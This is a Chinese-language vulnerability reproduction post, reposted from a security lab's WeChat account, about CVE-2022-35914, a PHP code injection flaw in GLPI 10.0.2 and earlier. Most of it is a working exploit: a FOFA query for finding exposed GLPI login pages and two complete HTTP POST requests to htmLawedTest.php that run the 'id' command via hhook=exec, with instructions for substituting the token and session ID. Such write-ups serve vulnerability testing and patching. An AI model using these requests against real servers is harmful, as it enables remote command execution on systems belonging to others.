CVE-2022-35914-GLPI 注入漏洞

本文转载于公众号：融云攻防实验室，原文地址：

漏洞复现 CVE-2022-35914-GLPI 注入漏洞

0x01 阅读须知

0x02 漏洞描述

GLPI是个人开发者的一款开源IT和资产管理软件。该软件提供功能全面的IT资源管理接口，你可以用它来建立数据库全面管理IT的电脑，显示器，服务器，打印机，网络设备，电话，甚至硒鼓和墨盒等。GLPI10.0.2及之前版本存在安全漏洞，该漏洞源于htmlawed模块中的/vendor/htmlawed/htmlawed/htmLawedTest.php允许PHP代码注入。

0x03 漏洞复现

fofa：title=”GLPI – 登陆入口”

1.执行POC获取token和sid

POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: sid=d531j7fek8t6v3d0d0jpk558q5
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 88

token=6dfbe8fefb8bf88a06596e458b976911&text=id&hhook=exec&sid=d531j7fek8t6v3d0d0jpk558q5

2.将sid在cookie头和POST数据包token参数中替换，将token在POST数据包token参数中替换，exec执行id命令，得到回显

POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: sid=ee0ql32b04rkhcr641m52tv934
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 88

token=a2d3618c141af7dab26afced9b588f83&text=id&hhook=exec&sid=ee0ql32b04rkhcr641m52tv934